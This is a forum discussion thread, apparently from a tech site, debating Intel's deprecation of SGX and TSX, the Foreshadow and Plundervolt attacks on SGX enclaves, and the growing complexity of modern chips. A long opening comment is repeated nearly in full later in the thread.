Yup. SGX, TSX, all the interesting and complicated stuff seems to be getting deprecated after half a decade or more of "We got it! No, wait, we didn't... uh, this time we got it! Wait, crap, no... uh... but this time! Oh carp. Yeah, you know, screw it."
After several of those "Release, revert" cycles, it ends up as a self fulfilling prophecy anyway - it's like the sentiment towards Google's new products you see often: "This, too, shall rapidly pass when they get bored." After you've seen TSX disabled on a few generation of chips, the motivation to put the work in to make something work with TSX just kind of evaporates, because you've no confidence that it'll actually work, or stay working, on hardware you want to run on. And because of the requirement to have a fallback path, TSX is a good bit more work, and, often, requires more complexity than a simple lock based approach that's good enough and simple to understand/validate.
But my deeper concern is that it seems that nobody at Intel is capable of understanding all the interaction in the chip anymore - and SGX offers very strong evidence of this inability.
SGX made the strong claim that, when deployed, a fully malicious ring 0 operating system could neither observe anything about the state of the compute happening in the enclave, nor modify the operation of that. They did various interesting things with how pages were swapped out to prevent replay attacks, and really did try to build it such that you couldn't mess with it. But they did these things at a high level, and didn't fully understand the nature of the chip.
The L1TF (L1 Terminal Fault, also known as Foreshadow) attacks took advantage of the edge case L1 cache behavior to speculate out out anything that was in L1 cache, which included SGX enclave data. If I remember properly, because you could read out the stored register state as well as memory pages you faulted in, they demonstrated you could essentially single step a production SGX enclave with full register state and full memory state at every single instruction. Whoops.
It's not hard to mitigate once you know the problem - just flush L1 entirely on exit. But Intel didn't know it was a problem, so they didn't do that.
On the flip side, "influencing operation," there was Plundervolt. This involved the OS using an undocumented (grumble growl) MSR to reduce the voltage of the chip for improving efficiency of operation. However, the OS (that untrusted ring 0 thing...) has control over this register. And there aren't sane limits on it, such that the OS can drop the voltage enough that things like "multiply" and "AES operations" start faulting and glitching (silently), without being low enough that the chip stops functioning. Enter an enclave in this state, wait for multiply or AES to fault in the useful ways they will, and you've just influenced operation such that you can pull keys out. Whoops.
Again, it's not hard to mitigate. Refuse to enter if the voltage isn't at stock settings (you can't just reset it on entry because it takes time for the VRMs to bring the voltage back up). But Intel didn't do this. The people who added this neat little efficiency hack and then kept it secret never rubbed the right way with the people in charge of the new flagship security features around the sort of adversarial thinkers who can ask "Now, wait a minute, what if I push this beyond sane bounds?"
You can point at the other speculative stuff and claim it's not really a problem because architectural behavior is correct (I think that sort of reasoning is rubbish, when you can speculate your way past all security boundaries on the chip), but the SGX case, specifically, demonstrates that Intel didn't know about the problems or they would have taken the very simple mitigation steps. And that tells me that they can't reason about their chips as a whole.
... and that - hardware companies of the most critical components of the system not having a full understanding of how they operate - is scary. The foundation of everything is in an unknown state, and nobody knows how broken it is until some researchers go in and figure it out.
More than once, after fixing the exact thing the researchers found, Intel has also had egg on their face of the "... so we found this very, very closely related, conceptually identical bug that they didn't fix with the last patches..." variety. It seems safe to say that there are university students and faculty who understand the security implications of Intel's design decision better than the people at Intel in charge of such things.
We're running, very rapidly, out of "complexity runway." Everything, from the very chips on up, is so complex that nobody can reason about it, and the only solution to the very problems caused by complexity is, "Well, let's add more complexity to fix those problems." It's not the sort of thing that can go on forever.
I think that sort of reasoning is rubbish, when you can speculate your way past all security boundaries on the chip
The ring boundaries of protected mode were never meant as a strong security feature against malice. The documentation of the 286, the first CPU in which they were introduced, is very clear in saying that. It's unfortunate how many assumed otherwise and built an entire industry upon that misunderstanding.
One sees the same problems with ASLR - page tables were never intended or designed to carry security sensitive information, which the various forms of ASLR are. And so, we see the prefetch oracle, and various cache based trickery to de-ASLR things, because the page tables and page walkers were never designed to consider security, only correctness.
I don't know how to fix it, though.
I've been experimenting with Qubes lately, which disables hyperthreading if you have it, and uses hardware isolated VMs to at least make things a little bit harder - the assumption is that within a running OS VM/silo, anything can access anything, so keep them separated. And they've done a lot of good paranoid work along those lines. I'm just not sure the end goal of very strong isolation is even possible on the same machine.
Of course, there are chips that are immune to speculation based vulnerabilities. They're not fast, and they're not very modern, but the Atom D525 in my little netbook has an empty "bugs" field in /proc/cpuinfo, because it's an in-order, non-speculative x86 core. It's just rather glacial.
I agree with a lot of what you write, and I also think we are way beyond that "comprehensibility boundary" when it comes to modern tech stacks. There is just no single person who understands exactly what happens on all levels of the stack when I send this reply.
But also, this process of "we got it, wait we didn't..." is just how real world security works, there is no way around it. Security is not <clever research team coming up with moon math> and problem is solved. Security is complex, and takes years of attack incentives and hardening to mature. TLS implementations can use the best crypto algorithms we know of, and we still get Heartbleed. Intel already with the very first release of SGX introduced the TCB recovery mechanism, precisely because they knew users are bound to find vulnerabilities.
There is also a strong hysteresis effect because of the long release cycle of chips. For example, SGX was released in 2015/2016 with Skylake, and then two years later we discovered Meltdown/Spectre and with them a whole new dimension of attacks on the CPU. However, Intel couldn't just release a hotfix for their hardware, it took a lot of time and work to re-design the CPU to be more side-channel resistant, and in the meantime security researchers naturally latched onto these attacks, giving the false impression that the whole idea of secure compute is flawed.
Personally I would not bet on CC tech becoming obsolete, on the contrary, a lot of Big Tech are pumping more and more resources into it, and there is increasing demand from various industries. The tech will stay around, it will mature, and perhaps vendors will even start to introduce HSM-like hardware protection mechanisms if there is enough demand.
After several of those "Release, revert" cycles, it ends up as a self fulfilling prophecy anyway - it's like the sentiment towards Google's new products you see often: "This, too, shall rapidly pass when they get bored." After you've seen TSX disabled on a few generation of chips, the motivation to put the work in to make something work with TSX just kind of evaporates, because you've no confidence that it'll actually work, or stay working, on hardware you want to run on. And because of the requirement to have a fallback path, TSX is a good bit more work, and, often, requires more complexity than a simple lock based approach that's good enough and simple to understand/validate.
But my deeper concern is that it seems that nobody at Intel is capable of understanding all the interaction in the chip anymore - and SGX offers very strong evidence of this inability.
SGX made the strong claim that, when deployed, a fully malicious ring 0 operating system could neither observe anything about the state of the compute happening in the enclave, nor modify the operation of that. They did various interesting things with how pages were swapped out to prevent replay attacks, and really did try to build it such that you couldn't mess with it. But they did these things at a high level, and didn't fully understand the nature of the chip.
The L1TF (L1 Terminal Fault, also known as Foreshadow) attacks took advantage of the edge case L1 cache behavior to speculate out out anything that was in L1 cache, which included SGX enclave data. If I remember properly, because you could read out the stored register state as well as memory pages you faulted in, they demonstrated you could essentially single step a production SGX enclave with full register state and full memory state at every single instruction. Whoops.
It's not hard to mitigate once you know the problem - just flush L1 entirely on exit. But Intel didn't know it was a problem, so they didn't do that.
On the flip side, "influencing operation," there was Plundervolt. This involved the OS using an undocumented (grumble growl) MSR to reduce the voltage of the chip for improving efficiency of operation. However, the OS (that untrusted ring 0 thing...) has control over this register. And there aren't sane limits on it, such that the OS can drop the voltage enough that things like "multiply" and "AES operations" start faulting and glitching (silently), without being low enough that the chip stops functioning. Enter an enclave in this state, wait for multiply or AES to fault in the useful ways they will, and you've just influenced operation such that you can pull keys out. Whoops.
Again, it's not hard to mitigate. Refuse to enter if the voltage isn't at stock settings (you can't just reset it on entry because it takes time for the VRMs to bring the voltage back up). But Intel didn't do this. The people who added this neat little efficiency hack and then kept it secret never rubbed the right way with the people in charge of the new flagship security features around the sort of adversarial thinkers who can ask "Now, wait a minute, what if I push this beyond sane bounds?"
You can point at the other speculative stuff and claim it's not really a problem because architectural behavior is correct (I think that sort of reasoning is rubbish, when you can speculate your way past all security boundaries on the chip), but the SGX case, specifically, demonstrates that Intel didn't know about the problems or they would have taken the very simple mitigation steps. And that tells me that they can't reason about their chips as a whole.
... and that - hardware companies of the most critical components of the system not having a full understanding of how they operate - is scary. The foundation of everything is in an unknown state, and nobody knows how broken it is until some researchers go in and figure it out.
More than once, after fixing the exact thing the researchers found, Intel has also had egg on their face of the "... so we found this very, very closely related, conceptually identical bug that they didn't fix with the last patches..." variety. It seems safe to say that there are university students and faculty who understand the security implications of Intel's design decision better than the people at Intel in charge of such things.
We're running, very rapidly, out of "complexity runway." Everything, from the very chips on up, is so complex that nobody can reason about it, and the only solution to the very problems caused by complexity is, "Well, let's add more complexity to fix those problems." It's not the sort of thing that can go on forever.
Anyway. </rant about the state of Intel>